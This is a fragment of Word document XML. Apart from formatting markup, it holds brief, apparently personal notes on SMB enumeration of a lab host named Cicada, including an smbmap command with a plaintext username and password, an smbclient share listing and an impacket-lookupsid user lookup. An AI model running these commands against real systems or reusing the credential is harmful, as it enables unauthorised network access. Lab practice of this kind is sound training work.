      <w:r w:rsidR="000318E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sudo smbmap -H 10.10.10.10 -u Michael.wrightson -p ‘Cicada$M6Corpb*@Lp#nZp!8’</w:t>
      </w:r>
      <w:r w:rsidR="00551CA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0008798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w:t>
      </w:r>
      <w:r w:rsidR="00551CA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share directories and the permissions the user ha</w:t>
      </w:r>
      <w:r w:rsidR="0008798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00551CA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on each directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F586D1" w14:textId="70CEFCFB" w:rsidR="00F663C6" w:rsidRDefault="00F663C6" w:rsidP="00136837">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Smbclient //10.10.11.35/HR – mey let you see the co</w:t>
      </w:r>
      <w:r w:rsidR="009C551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nt of the shared directory</w:t>
      </w:r>
      <w:r w:rsidR="00765F7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(even it without password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E25D49" w14:textId="7904A4F0" w:rsidR="006E6E60" w:rsidRPr="00136837" w:rsidRDefault="006E6E60" w:rsidP="00136837">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Impacket-lookupsid </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="005B6276">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>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admin@10.10.10.10</w:t>
        </w:r>
      </w:hyperlink>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85DB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85DB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could let you find usernames</w:t>
      </w:r>
      <w:r w:rsidR="000901F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their SID</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006E6E60" w:rsidRPr="00136837" w:rsidSect="00E17DBC">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04E41"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="830830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BE4B1C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="64741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B64AE2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7108A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67626D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="13060FE0"/>
    <w:lvl w:ilvl="0" w:tplc="985C7A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691735B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BE58DEBA"/>
    <w:lvl w:ilvl="0" w:tplc="9C18ED9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599677258">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1971741777">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="382022606">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="262499376">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="17708126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7DE"/>
    <w:rsid w:val="000042E7"/>
    <w:rsid w:val="00010244"/>
    <w:rsid w:val="000104DD"/>
    <w:rsid w:val="000120DF"/>
    <w:rsid w:val="000164C5"/>
    <w:rsid w:val="00021236"/>
    <w:rsid w:val="00021B18"/>
    <w:rsid w:val="00024C40"/>
    <w:rsid w:val="00026823"/>
    <w:rsid w:val="000318ED"/>
    <w:rsid w:val="00032DDE"/>
    <w:rsid w:val="00042906"/>
    <w:rsid w:val="00045548"/>
    <w:rsid w:val="0005505E"/>
    <w:rsid w:val="00056771"/>
    <w:rsid w:val="0005741C"/>
    <w:rsid w:val="00061C0E"/>
    <w:rsid w:val="00065E66"/>
    <w:rsid w:val="00074A8B"/>
    <w:rsid w:val="0008798C"/>
    <w:rsid w:val="000901F3"/>
    <w:rsid w:val="000906A3"/>
    <w:rsid w:val="00090CBC"/>
    <w:rsid w:val="00093FDF"/>
    <w:rsid w:val="0009466A"/>
    <w:rsid w:val="000A0D7F"/>
    <w:rsid w:val="000B0A5C"/>
    <w:rsid w:val="000C1525"/>
    <w:rsid w:val="000C387E"/>
    <w:rsid w:val="000D08CD"/>
    <w:rsid w:val="000D0B27"/>
    <w:rsid w:val="000D38A6"/>
    <w:rsid w:val="000D4F85"/>
    <w:rsid w:val="000D61EA"/>
    <w:rsid w:val="000E13AB"/>
    <w:rsid w:val="000E1FB5"/>
    <w:rsid w:val="000E6152"/>
    <w:rsid w:val="000F11FF"/>
    <w:rsid w:val="001038E7"/>
    <w:rsid w:val="00105047"/>
    <w:rsid w:val="00110024"/>
    <w:rsid w:val="00115F48"/>
    <w:rsid w:val="00130E25"/>
    <w:rsid w:val="00131B33"/>
    <w:rsid w:val="00132564"/>
    <w:rsid w:val="00134126"/>
    <w:rsid w:val="00136837"/>
    <w:rsid w:val="001418A0"/>
    <w:rsid w:val="00165101"/>
    <w:rsid w:val="00170589"/>
    <w:rsid w:val="0017417B"/>
    <w:rsid w:val="00180663"/>
    <w:rsid w:val="001A42D8"/>
    <w:rsid w:val="001A6FC4"/>
    <w:rsid w:val="001C0EBD"/>
    <w:rsid w:val="001C5241"/>
    <w:rsid w:val="001D0E2C"/>
    <w:rsid w:val="001E10F4"/>
    <w:rsid w:val="001E4F28"/>
    <w:rsid w:val="001E6FD2"/>
    <w:rsid w:val="001F05FB"/>
    <w:rsid w:val="001F44E7"/>
    <w:rsid w:val="002010E1"/>
    <w:rsid w:val="00201A21"/>
    <w:rsid w:val="002170DA"/>
    <w:rsid w:val="00220A8C"/>
    <w:rsid w:val="00220C1F"/>
    <w:rsid w:val="00227792"/>
    <w:rsid w:val="00233685"/>
    <w:rsid w:val="00255438"/>
    <w:rsid w:val="00260CB4"/>
    <w:rsid w:val="00265644"/>
    <w:rsid w:val="00294C81"/>
    <w:rsid w:val="00296C76"/>
    <w:rsid w:val="00297646"/>
    <w:rsid w:val="002A6727"/>
    <w:rsid w:val="002B6713"/>
    <w:rsid w:val="002C1548"/>
    <w:rsid w:val="002C5B72"/>
    <w:rsid w:val="002C7E3B"/>
    <w:rsid w:val="002D166C"/>
    <w:rsid w:val="002D17B5"/>
    <w:rsid w:val="002D2B47"/>
    <w:rsid w:val="002D35E9"/>
    <w:rsid w:val="002D7121"/>
    <w:rsid w:val="002F0752"/>
    <w:rsid w:val="002F4F3E"/>
    <w:rsid w:val="002F5701"/>
    <w:rsid w:val="002F60DB"/>
    <w:rsid w:val="002F7AA6"/>
    <w:rsid w:val="003000B5"/>
    <w:rsid w:val="00326F43"/>
    <w:rsid w:val="00327EAE"/>
    <w:rsid w:val="00337BF7"/>
    <w:rsid w:val="00340595"/>
    <w:rsid w:val="003467DE"/>
    <w:rsid w:val="00360534"/>
    <w:rsid w:val="003618C0"/>
    <w:rsid w:val="00361DDD"/>
    <w:rsid w:val="0036430B"/>
    <w:rsid w:val="003715FF"/>
    <w:rsid w:val="00371819"/>
    <w:rsid w:val="00372529"/>
    <w:rsid w:val="003728BE"/>
    <w:rsid w:val="003907BC"/>
    <w:rsid w:val="00390A2E"/>
    <w:rsid w:val="0039333C"/>
    <w:rsid w:val="003A088F"/>
    <w:rsid w:val="003A2A80"/>
    <w:rsid w:val="003A3976"/>
    <w:rsid w:val="003A5B81"/>
    <w:rsid w:val="003B1C01"/>
    <w:rsid w:val="003B35C9"/>
    <w:rsid w:val="003C1974"/>
    <w:rsid w:val="003C2A98"/>
    <w:rsid w:val="003D0295"/>
    <w:rsid w:val="003D0B21"/>
    <w:rsid w:val="003D0EAF"/>
    <w:rsid w:val="003D3CFF"/>
    <w:rsid w:val="003D50FC"/>
    <w:rsid w:val="003D5CCB"/>
    <w:rsid w:val="003D6D1D"/>
    <w:rsid w:val="003E0EA2"/>
    <w:rsid w:val="003E0F51"/>
    <w:rsid w:val="00406BD8"/>
    <w:rsid w:val="00407DB3"/>
    <w:rsid w:val="0041017E"/>
    <w:rsid w:val="00412636"/>
    <w:rsid w:val="00425D14"/>
    <w:rsid w:val="00425FB7"/>
    <w:rsid w:val="00426AC0"/>
    <w:rsid w:val="0043077E"/>
    <w:rsid w:val="0043317B"/>
    <w:rsid w:val="0043739B"/>
    <w:rsid w:val="0044046E"/>
    <w:rsid w:val="004456B5"/>
    <w:rsid w:val="00460961"/>
    <w:rsid w:val="00460AF6"/>
    <w:rsid w:val="00461CCA"/>
    <w:rsid w:val="00475987"/>
    <w:rsid w:val="004772A3"/>
    <w:rsid w:val="00480370"/>
    <w:rsid w:val="00495A6E"/>
    <w:rsid w:val="004B172E"/>
    <w:rsid w:val="004B7459"/>
    <w:rsid w:val="004C174E"/>
    <w:rsid w:val="004E119A"/>
    <w:rsid w:val="004E7214"/>
    <w:rsid w:val="005000CB"/>
    <w:rsid w:val="005017A7"/>
    <w:rsid w:val="00502E69"/>
    <w:rsid w:val="005033DB"/>
    <w:rsid w:val="0052648E"/>
    <w:rsid w:val="00531FCC"/>
    <w:rsid w:val="0053370D"/>
    <w:rsid w:val="00540DD2"/>
    <w:rsid w:val="00551CAF"/>
    <w:rsid w:val="005578F8"/>
    <w:rsid w:val="00563E0A"/>
    <w:rsid w:val="0056512E"/>
    <w:rsid w:val="005675ED"/>
    <w:rsid w:val="005832B0"/>
    <w:rsid w:val="00585246"/>
    <w:rsid w:val="005855F8"/>
    <w:rsid w:val="00586BFC"/>
    <w:rsid w:val="00592E6C"/>
    <w:rsid w:val="00596447"/>
    <w:rsid w:val="005A3156"/>
    <w:rsid w:val="005C2B40"/>
    <w:rsid w:val="005C5093"/>
    <w:rsid w:val="005C6F18"/>
    <w:rsid w:val="005E279D"/>
    <w:rsid w:val="005E6285"/>
    <w:rsid w:val="005E6FE5"/>
    <w:rsid w:val="00601862"/>
    <w:rsid w:val="00601DF1"/>
    <w:rsid w:val="00605A20"/>
    <w:rsid w:val="00613EAF"/>
    <w:rsid w:val="00614931"/>
    <w:rsid w:val="00620850"/>
    <w:rsid w:val="0062161E"/>
    <w:rsid w:val="00623466"/>
    <w:rsid w:val="0062373E"/>
    <w:rsid w:val="00634FC1"/>
    <w:rsid w:val="00647E23"/>
    <w:rsid w:val="0065544A"/>
    <w:rsid w:val="00655DAB"/>
    <w:rsid w:val="00660D7F"/>
    <w:rsid w:val="0066281F"/>
    <w:rsid w:val="00662F80"/>
    <w:rsid w:val="00670C38"/>
    <w:rsid w:val="00672E38"/>
    <w:rsid w:val="006749F7"/>
    <w:rsid w:val="00684BDD"/>
    <w:rsid w:val="00685BB6"/>
    <w:rsid w:val="0069419E"/>
    <w:rsid w:val="00697594"/>
    <w:rsid w:val="00697957"/>
    <w:rsid w:val="006A7925"/>
    <w:rsid w:val="006B420E"/>
    <w:rsid w:val="006C0698"/>
    <w:rsid w:val="006C60E7"/>
    <w:rsid w:val="006C63AB"/>
    <w:rsid w:val="006C7522"/>
    <w:rsid w:val="006D0E34"/>
    <w:rsid w:val="006D297C"/>
    <w:rsid w:val="006D49FC"/>
    <w:rsid w:val="006D75C9"/>
    <w:rsid w:val="006E5D31"/>
    <w:rsid w:val="006E6E60"/>
    <w:rsid w:val="006F0038"/>
    <w:rsid w:val="006F40E6"/>
    <w:rsid w:val="006F50F4"/>
    <w:rsid w:val="00702525"/>
    <w:rsid w:val="0072035A"/>
    <w:rsid w:val="00723AB1"/>
    <w:rsid w:val="007255CC"/>
    <w:rsid w:val="00726FC1"/>
    <w:rsid w:val="00730659"/>
    <w:rsid w:val="0074350B"/>
    <w:rsid w:val="00752E0F"/>
    <w:rsid w:val="00765F72"/>
    <w:rsid w:val="007676FF"/>
    <w:rsid w:val="0077103E"/>
    <w:rsid w:val="00772D97"/>
    <w:rsid w:val="00786159"/>
    <w:rsid w:val="007B0372"/>
    <w:rsid w:val="007B255B"/>
    <w:rsid w:val="007B4EEE"/>
    <w:rsid w:val="007C290D"/>
    <w:rsid w:val="007D60FA"/>
    <w:rsid w:val="007E7A84"/>
    <w:rsid w:val="007F4170"/>
    <w:rsid w:val="00800C80"/>
    <w:rsid w:val="0080350A"/>
    <w:rsid w:val="00804B18"/>
    <w:rsid w:val="00806014"/>
    <w:rsid w:val="00810F6C"/>
    <w:rsid w:val="008110CE"/>
    <w:rsid w:val="00813496"/>
    <w:rsid w:val="00813D0D"/>
    <w:rsid w:val="008154F1"/>
    <w:rsid w:val="00817295"/>
    <w:rsid w:val="00847C8A"/>
    <w:rsid w:val="00873EBB"/>
    <w:rsid w:val="00882BF3"/>
    <w:rsid w:val="00883A17"/>
    <w:rsid w:val="00885DB4"/>
    <w:rsid w:val="0088672A"/>
    <w:rsid w:val="00892789"/>
    <w:rsid w:val="0089352E"/>
    <w:rsid w:val="00897B79"/>
    <w:rsid w:val="008A0F76"/>
    <w:rsid w:val="008A3638"/>
    <w:rsid w:val="008A5775"/>
    <w:rsid w:val="008A6D1E"/>
    <w:rsid w:val="008A7727"/>
    <w:rsid w:val="008C066C"/>
    <w:rsid w:val="008C1582"/>
    <w:rsid w:val="008C3FDF"/>
    <w:rsid w:val="008D1514"/>
    <w:rsid w:val="008D2D4C"/>
    <w:rsid w:val="008D2F34"/>
    <w:rsid w:val="008D404F"/>
    <w:rsid w:val="008E373A"/>
    <w:rsid w:val="008E3BEF"/>
    <w:rsid w:val="008E6B86"/>
    <w:rsid w:val="008E7552"/>
    <w:rsid w:val="008F37CD"/>
    <w:rsid w:val="009163B0"/>
    <w:rsid w:val="00920AE9"/>
    <w:rsid w:val="009270C0"/>
    <w:rsid w:val="00930780"/>
    <w:rsid w:val="00930AF1"/>
    <w:rsid w:val="00933DDE"/>
    <w:rsid w:val="009364DF"/>
    <w:rsid w:val="00940D3C"/>
    <w:rsid w:val="0094127D"/>
    <w:rsid w:val="00943D30"/>
    <w:rsid w:val="00950D1D"/>
    <w:rsid w:val="00952985"/>
    <w:rsid w:val="0096541F"/>
    <w:rsid w:val="009775E5"/>
    <w:rsid w:val="00980E0E"/>
    <w:rsid w:val="00980E58"/>
    <w:rsid w:val="0098268D"/>
    <w:rsid w:val="00987E1B"/>
    <w:rsid w:val="009A1845"/>
    <w:rsid w:val="009A296D"/>
    <w:rsid w:val="009A2FE7"/>
    <w:rsid w:val="009B1FA0"/>
    <w:rsid w:val="009C5518"/>
    <w:rsid w:val="009C77E4"/>
    <w:rsid w:val="009D0E12"/>
    <w:rsid w:val="009D25B0"/>
    <w:rsid w:val="009D4D4B"/>
    <w:rsid w:val="009E0CBD"/>
    <w:rsid w:val="009E3A59"/>
    <w:rsid w:val="009E75D5"/>
    <w:rsid w:val="009F3651"/>
    <w:rsid w:val="00A01C63"/>
    <w:rsid w:val="00A16267"/>
    <w:rsid w:val="00A16B3E"/>
    <w:rsid w:val="00A25701"/>
    <w:rsid w:val="00A25F69"/>
    <w:rsid w:val="00A27EB3"/>
    <w:rsid w:val="00A30CDC"/>
    <w:rsid w:val="00A36FBE"/>
    <w:rsid w:val="00A37D8C"/>
    <w:rsid w:val="00A42FA5"/>
    <w:rsid w:val="00A47F17"/>
    <w:rsid w:val="00A503FD"/>
    <w:rsid w:val="00A625A1"/>
    <w:rsid w:val="00A664C2"/>
    <w:rsid w:val="00A716BA"/>
    <w:rsid w:val="00A71BB3"/>
    <w:rsid w:val="00A74E5E"/>
    <w:rsid w:val="00A80D19"/>
    <w:rsid w:val="00AA1546"/>
    <w:rsid w:val="00AA413F"/>
    <w:rsid w:val="00AB08CB"/>
    <w:rsid w:val="00AC0D7D"/>
    <w:rsid w:val="00AC2D8D"/>
    <w:rsid w:val="00AC4B75"/>
    <w:rsid w:val="00AD3C26"/>
    <w:rsid w:val="00AD5A99"/>
    <w:rsid w:val="00AD7813"/>
    <w:rsid w:val="00AE7481"/>
    <w:rsid w:val="00B01DEA"/>
    <w:rsid w:val="00B02F1C"/>
    <w:rsid w:val="00B0335A"/>
    <w:rsid w:val="00B102B3"/>
    <w:rsid w:val="00B106EC"/>
    <w:rsid w:val="00B1107D"/>
    <w:rsid w:val="00B150B7"/>
    <w:rsid w:val="00B215E0"/>
    <w:rsid w:val="00B268F8"/>
    <w:rsid w:val="00B30837"/>
    <w:rsid w:val="00B30D0C"/>
    <w:rsid w:val="00B30F5D"/>
    <w:rsid w:val="00B31BEF"/>
    <w:rsid w:val="00B369D0"/>
    <w:rsid w:val="00B4458F"/>
    <w:rsid w:val="00B53A54"/>
    <w:rsid w:val="00B634A3"/>
    <w:rsid w:val="00B64404"/>
    <w:rsid w:val="00B75E87"/>
    <w:rsid w:val="00B7689F"/>
    <w:rsid w:val="00B77A37"/>
    <w:rsid w:val="00B839D5"/>
    <w:rsid w:val="00B87F1F"/>
    <w:rsid w:val="00B95301"/>
    <w:rsid w:val="00B97BF5"/>
    <w:rsid w:val="00BB17D9"/>
    <w:rsid w:val="00BC0DD1"/>
    <w:rsid w:val="00BD11C3"/>
    <w:rsid w:val="00BD1A97"/>
    <w:rsid w:val="00BD4340"/>
    <w:rsid w:val="00BF7833"/>
    <w:rsid w:val="00C00D12"/>
    <w:rsid w:val="00C1032A"/>
    <w:rsid w:val="00C11F4F"/>
    <w:rsid w:val="00C15324"/>
    <w:rsid w:val="00C23D7B"/>
    <w:rsid w:val="00C30858"/>
    <w:rsid w:val="00C331AC"/>
    <w:rsid w:val="00C35EE5"/>
    <w:rsid w:val="00C37C9A"/>
    <w:rsid w:val="00C4394F"/>
    <w:rsid w:val="00C44632"/>
    <w:rsid w:val="00C4612C"/>
    <w:rsid w:val="00C567D6"/>
    <w:rsid w:val="00C62672"/>
    <w:rsid w:val="00C8563B"/>
    <w:rsid w:val="00C874E8"/>
    <w:rsid w:val="00C95C68"/>
    <w:rsid w:val="00C97ECA"/>
    <w:rsid w:val="00CA2A19"/>
    <w:rsid w:val="00CC2CFA"/>
    <w:rsid w:val="00CC4C4B"/>
    <w:rsid w:val="00CC6C94"/>
    <w:rsid w:val="00CC796D"/>
    <w:rsid w:val="00CD1987"/>
    <w:rsid w:val="00CD1EAB"/>
    <w:rsid w:val="00CD2538"/>
    <w:rsid w:val="00CD32C1"/>
    <w:rsid w:val="00CE32EB"/>
    <w:rsid w:val="00CE3331"/>
    <w:rsid w:val="00CF33F1"/>
    <w:rsid w:val="00CF3565"/>
    <w:rsid w:val="00CF6334"/>
    <w:rsid w:val="00CF6E4C"/>
    <w:rsid w:val="00D00FB0"/>
    <w:rsid w:val="00D14135"/>
    <w:rsid w:val="00D15AE0"/>
    <w:rsid w:val="00D232DD"/>
    <w:rsid w:val="00D27AC8"/>
    <w:rsid w:val="00D360F5"/>
    <w:rsid w:val="00D372E2"/>
    <w:rsid w:val="00D37B8F"/>
    <w:rsid w:val="00D521CF"/>
    <w:rsid w:val="00D5584C"/>
    <w:rsid w:val="00D80B1B"/>
    <w:rsid w:val="00D80EF2"/>
    <w:rsid w:val="00D841C6"/>
    <w:rsid w:val="00D8498F"/>
    <w:rsid w:val="00D85A07"/>
    <w:rsid w:val="00D87A16"/>
    <w:rsid w:val="00D924ED"/>
    <w:rsid w:val="00DB41C9"/>
    <w:rsid w:val="00DD7DC9"/>
    <w:rsid w:val="00DE0241"/>
    <w:rsid w:val="00DE253C"/>
    <w:rsid w:val="00E0359F"/>
    <w:rsid w:val="00E12743"/>
    <w:rsid w:val="00E17DBC"/>
    <w:rsid w:val="00E204D2"/>
    <w:rsid w:val="00E254BD"/>
    <w:rsid w:val="00E33098"/>
    <w:rsid w:val="00E34555"/>
    <w:rsid w:val="00E41A27"/>
    <w:rsid w:val="00E42462"/>
    <w:rsid w:val="00E45354"/>
    <w:rsid w:val="00E52D0A"/>
    <w:rsid w:val="00E7040D"/>
    <w:rsid w:val="00E706C9"/>
    <w:rsid w:val="00E80AD1"/>
    <w:rsid w:val="00E90810"/>
    <w:rsid w:val="00E957E7"/>
    <w:rsid w:val="00E96AF9"/>
    <w:rsid w:val="00EA275D"/>
    <w:rsid w:val="00EA6EB0"/>
    <w:rsid w:val="00EB2E07"/>
    <w:rsid w:val="00EC2FA6"/>
    <w:rsid w:val="00ED035E"/>
    <w:rsid w:val="00ED15CF"/>
    <w:rsid w:val="00ED1CCC"/>
    <w:rsid w:val="00EE1783"/>
    <w:rsid w:val="00EE2976"/>
    <w:rsid w:val="00EF3DD2"/>
    <w:rsid w:val="00EF488F"/>
    <w:rsid w:val="00EF4C60"/>
    <w:rsid w:val="00F06909"/>
    <w:rsid w:val="00F21800"/>
    <w:rsid w:val="00F32E78"/>
    <w:rsid w:val="00F344AA"/>
    <w:rsid w:val="00F35639"/>
    <w:rsid w:val="00F36876"/>
    <w:rsid w:val="00F50DB7"/>
    <w:rsid w:val="00F613E9"/>
    <w:rsid w:val="00F663C6"/>
    <w:rsid w:val="00F806EA"/>
    <w:rsid w:val="00F833E7"/>
    <w:rsid w:val="00F83721"/>
    <w:rsid w:val="00F948A1"/>
    <w:rsid w:val="00F954CE"/>
    <w:rsid w:val="00FA06B9"/>
    <w:rsid w:val="00FA63E9"/>
    <w:rsid w:val="00FA6911"/>
    <w:rsid w:val="00FC1610"/>
    <w:rsid w:val="00FC205C"/>
    <w:rsid w:val="00FD3637"/>
    <w:rsid w:val="00FD41BF"/>
    <w:rsid w:val="00FE275B"/>
    <w:rsid w:val="00FF3DB4"/>
    <w:rsid w:val="00FF42A0"/>
    <w:rsid w:val="00FF6A8D"/>
    <w:rsid w:val="00FF725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520C8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CD0F4000-9F40-429C-9BC2-BB7BE1321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7AA6"/>
    <w:pPr>
      <w:bidi/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="003467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67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67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67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67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67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67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67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67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67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67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67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67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67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67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67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67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67DE"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="003467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67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67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67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67DE"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="003467DE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="003467DE"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="003467DE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="003467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67DE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="003467DE"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00201A21"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00201A21"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0037252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195183">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="66155687">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="84351935">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="113333150">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="225773250">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="255334294">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="298725559">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="323627271">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="342245319">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
